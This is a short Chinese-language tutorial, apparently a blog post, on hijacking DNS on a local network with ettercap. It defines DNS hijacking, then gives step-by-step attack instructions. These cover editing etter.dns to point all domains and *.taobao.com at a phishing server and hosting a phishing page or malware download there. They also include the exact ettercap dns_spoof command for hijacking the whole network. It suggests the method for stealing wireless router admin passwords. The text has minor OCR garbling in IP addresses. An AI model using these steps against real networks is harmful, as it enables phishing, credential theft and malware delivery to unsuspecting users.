使用ettercap进行DNS劫持

DNS劫持简介
DNS ( Domain Name System ,域名系
统) ,在互联网上作为域名和IP地址相互映射的
-个分布式数据库。DNS劫持又称域名劫持,是
指在劫持的网络范围内拦截域名解析的请求,分
析请求的域名,把审查范围以外的请求放行,或
者返回假的IP地址或者什么都不做使请求失去响
应,其效果就是对特定的网络不能反应或访问的
是假网址。
DNS被劫持后,常见的攻击行为主要有:
网络钓鱼、干扰用户正常访问网络、威胁用户账号
信息及财产安全
等。

使用ettercap进行DNS劫持
网关192.168.0.1
目标192.168.0.205
本机192.1 68.0.203
钓鱼服务器192.168.0.207
典型步骤:
1编辑ettercap的规则文件,修改DNS解析(最末端)
nano /etc/ettercap/etter.dns

  • A 192.168.0.207 把所有解析劫持到此IP

    *.taobao.com A 192.168.0.207添加正向解析
    *taobao.com PTR 192.1 68.0.207添加反向解析
    2.在钓鱼服务器搭建网页或者恶意软件下载
    3.使用ettercap及dns_ spoof插件进行全网劫持
    ettercap -Tq-i eth0 -P dns_ spoof /// ///
    可以在cmd下使用ipconfig/flushdns命令刷新DNS缓存
    也可使用图形界面进行劫持
    可以成为钓鱼获取无线路由器管理登录密码的方法补充
上一篇:网络欺骗工具Ettercap大学霸IT达人


下一篇:使用ettercap进行dns欺骗